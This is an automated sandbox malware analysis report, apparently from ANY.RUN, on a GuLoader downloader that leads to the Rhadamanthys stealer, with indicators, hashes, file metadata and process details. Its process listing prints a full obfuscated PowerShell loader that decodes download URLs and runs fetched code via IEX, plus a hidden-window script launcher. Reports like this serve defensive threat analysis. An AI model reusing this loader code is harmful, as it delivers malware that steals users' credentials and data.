File name:

powershell.exe

Full analysis: https://app.any.run/tasks/8f111392-565f-41eb-a627-f7250ef65d4b
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Malware Trends Tracker     >>>
Analysis date: July 02, 2024, 07:31:28
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
guloader
loader
rhadamanthys
stealer
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (console) x86-64, for MS Windows
MD5:

2E5A8590CF6848968FC23DE3FA1E25F1

SHA1:

801262E122DB6A2E758962896F260B55BBD0136A

SHA256:

9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3

SSDEEP:

12288:oufZaQ9EEEEEEEE4OvnEEEEEEEE4NDzw9jXhVXVVVV3+VVVVCNGxDx:outEEEEEEEE4MnEEEEEEEE4NDyjXbCx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • powershell.exe (PID: 3324)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 880)

    • GULOADER has been detected

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)

    • RHADAMANTHYS has been detected (SURICATA)

      • OOBE-Maintenance.exe (PID: 6352)
      • OpenWith.exe (PID: 7080)
      • dllhost.exe (PID: 4072)

    • Actions looks like stealing of personal data

      • OOBE-Maintenance.exe (PID: 6352)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • powershell.exe (PID: 3324)

    • Reads the date of Windows installation

      • powershell.exe (PID: 3324)

    • Application launched itself

      • powershell.exe (PID: 4072)

    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 4072)

    • The process executes VB scripts

      • powershell.exe (PID: 4072)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 936)

    • Checks Windows Trust Settings

      • powershell.exe (PID: 3324)
      • wab.exe (PID: 6980)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 4072)
      • wscript.exe (PID: 936)
      • powershell.exe (PID: 240)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 936)
      • powershell.exe (PID: 240)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)

    • Likely accesses (executes) a file from the Public directory

      • wscript.exe (PID: 936)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 6388)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 6980)
      • powershell.exe (PID: 3324)

    • The process checks if it is being run in the virtual environment

      • OpenWith.exe (PID: 7080)

    • Executes application which crashes

      • wab.exe (PID: 6980)

    • Loads DLL from Mozilla Firefox

      • OOBE-Maintenance.exe (PID: 6352)

    • Searches for installed software

      • OOBE-Maintenance.exe (PID: 6352)

    • Contacting a server suspected of hosting an CnC

      • OpenWith.exe (PID: 7080)
      • OOBE-Maintenance.exe (PID: 6352)
      • dllhost.exe (PID: 4072)

    • Process checks Powershell history file

      • powershell.exe (PID: 3324)

    • Connects to unusual port

      • dllhost.exe (PID: 4072)

  • INFO

    • Process checks computer location settings

      • powershell.exe (PID: 3324)

    • Checks supported languages

      • powershell.exe (PID: 3324)
      • acrobat_sl.exe (PID: 6324)
      • wab.exe (PID: 6980)
      • wmlaunch.exe (PID: 4164)
      • TextInputHost.exe (PID: 2888)

    • Reads the computer name

      • powershell.exe (PID: 3324)
      • wab.exe (PID: 6980)
      • TextInputHost.exe (PID: 2888)

    • Reads the software policy settings

      • powershell.exe (PID: 3324)
      • wab.exe (PID: 6980)

    • Create files in a temporary directory

      • powershell.exe (PID: 3324)

    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 3324)

    • Checks proxy server information

      • powershell.exe (PID: 4072)
      • powershell.exe (PID: 240)
      • wab.exe (PID: 6980)

    • Disables trace logs

      • powershell.exe (PID: 4072)
      • powershell.exe (PID: 240)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4072)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 880)
      • powershell.exe (PID: 6388)

    • Application launched itself

      • Acrobat.exe (PID: 3828)
      • AcroCEF.exe (PID: 3888)
      • firefox.exe (PID: 3068)
      • firefox.exe (PID: 4700)
      • firefox.exe (PID: 7096)
      • firefox.exe (PID: 3052)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 936)
      • powershell.exe (PID: 240)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 240)
      • powershell.exe (PID: 6388)

    • Executable content was dropped or overwritten

      • AdobeARM.exe (PID: 6260)

    • Creates files or folders in the user directory

      • wab.exe (PID: 6980)

    • Reads the machine GUID from the registry

      • wab.exe (PID: 6980)
      • wmlaunch.exe (PID: 4164)
      • powershell.exe (PID: 3324)

    • Manual execution by a user

      • OOBE-Maintenance.exe (PID: 6352)
      • powershell.exe (PID: 4072)
      • OpenWith.exe (PID: 7080)
      • firefox.exe (PID: 3068)
      • firefox.exe (PID: 3052)

    • Process checks Powershell version

      • powershell.exe (PID: 3324)

    • Reads Environment values

      • powershell.exe (PID: 3324)

    • Reads Microsoft Office registry keys

      • firefox.exe (PID: 4700)
      • firefox.exe (PID: 7096)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2096:03:14 04:00:21+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.2
CodeSize: 38400
InitializedDataSize: 418304
UninitializedDataSize: -
EntryPoint: 0x42a0
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 10
Subsystem: Windows command line
FileVersionNumber: 10.0.19041.3996
ProductVersionNumber: 10.0.19041.3996
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Windows PowerShell
FileVersion: 10.0.19041.3996 (WinBuild.160101.0800)
InternalName: POWERSHELL
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: PowerShell.EXE
ProductName: Microsoft® Windows® Operating System
ProductVersion: 10.0.19041.3996
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
210
Monitored processes
57
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs acrobat.exe no specs acrobat.exe no specs wscript.exe no specs #GULOADER powershell.exe conhost.exe no specs cmd.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs adobearm.exe acrobat_sl.exe no specs #GULOADER powershell.exe no specs cmd.exe no specs acrocef.exe no specs wab.exe #RHADAMANTHYS openwith.exe werfault.exe no specs #RHADAMANTHYS oobe-maintenance.exe conhost.exe no specs wmlaunch.exe no specs #RHADAMANTHYS dllhost.exe firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs textinputhost.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
240"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
244"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5140 -parentBuildID 20240213221259 -sandboxingKind 0 -prefsHandle 5112 -prefMapHandle 5048 -prefsLen 36339 -prefMapSize 244343 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26955065-ae48-4704-a074-9de40db2fcfe} 4700 "\\.\pipe\gecko-crash-server-pipe.4700" 1e4c10b2b10 utilityC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
1
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
640"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2256 -parentBuildID 20240213221259 -prefsHandle 2244 -prefMapHandle 2240 -prefsLen 30745 -prefMapSize 244343 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52f61c39-0d3f-4ace-92b5-cf80fa06a6c4} 7096 "\\.\pipe\gecko-crash-server-pipe.7096" 2b8e7580310 socketC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
880"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
880"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 1 -isForBrowser -prefsHandle 2980 -prefMapHandle 2888 -prefsLen 30953 -prefMapSize 244343 -jsInitHandle 1492 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed77543a-46ff-482c-b528-c7fec1cc87a8} 4700 "\\.\pipe\gecko-crash-server-pipe.4700" 1e4be751690 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
936"C:\WINDOWS\System32\WScript.exe" "C:\Users\Public\p2q.vbs" C:\Windows\System32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1088"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2752 --field-trial-handle=1632,i,15681717117980543323,4134619181818146211,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1140"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1616 --field-trial-handle=1632,i,15681717117980543323,4134619181818146211,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1452"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2448 --field-trial-handle=1632,i,15681717117980543323,4134619181818146211,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1512"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1716 --field-trial-handle=1632,i,15681717117980543323,4134619181818146211,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
